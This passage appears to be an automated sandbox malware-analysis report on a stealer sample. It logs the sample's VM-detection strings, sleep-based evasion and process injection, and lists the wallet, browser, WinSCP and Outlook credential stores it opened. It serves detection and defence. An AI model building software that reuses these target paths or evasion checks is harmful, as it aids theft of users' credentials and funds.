Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Window / User API: threadDelayed 1089	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Window / User API: threadDelayed 3288	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Window / User API: threadDelayed 798
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Window / User API: threadDelayed 2658

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3324	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3324	Thread sleep time: -7200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3328	Thread sleep count: 9241 > 30	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3328	Thread sleep count: 563 > 30	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3416	Thread sleep count: 4303 > 30	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3408	Thread sleep count: 1532 > 30	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3508	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3824	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3824	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3388	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3620	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3620	Thread sleep time: -8400000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3624	Thread sleep count: 762 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3624	Thread sleep count: 5907 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3620	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3564	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3804	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3804	Thread sleep time: -7200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3808	Thread sleep count: 1089 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3808	Thread sleep count: 3288 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3804	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3768	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3880	Thread sleep count: 798 > 30
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3888	Thread sleep count: 2658 > 30
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3932	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3912	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 4068	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 4068	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3864	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pCnWVMciWU
Source: Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Kbojz.exe, 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory written: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory written: C:\Users\user\AppData\Roaming\Kbojz.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory written: C:\Users\user\AppData\Roaming\Kbojz.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Queries volume information: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Queries volume information: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformation

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36451d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.35e5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.35e5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Kbojz.exe.3db62b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36051b0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36451d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36051b0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Kbojz.exe.3db62b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.472630617.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JwjpjAXX2iPkLxCgj32
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003

Source: Yara match	File source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kbojz.exe PID: 3840, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36451d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.35e5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.35e5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Kbojz.exe.3db62b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36051b0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36451d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Kbojz.exe.36051b0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Kbojz.exe.3db62b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
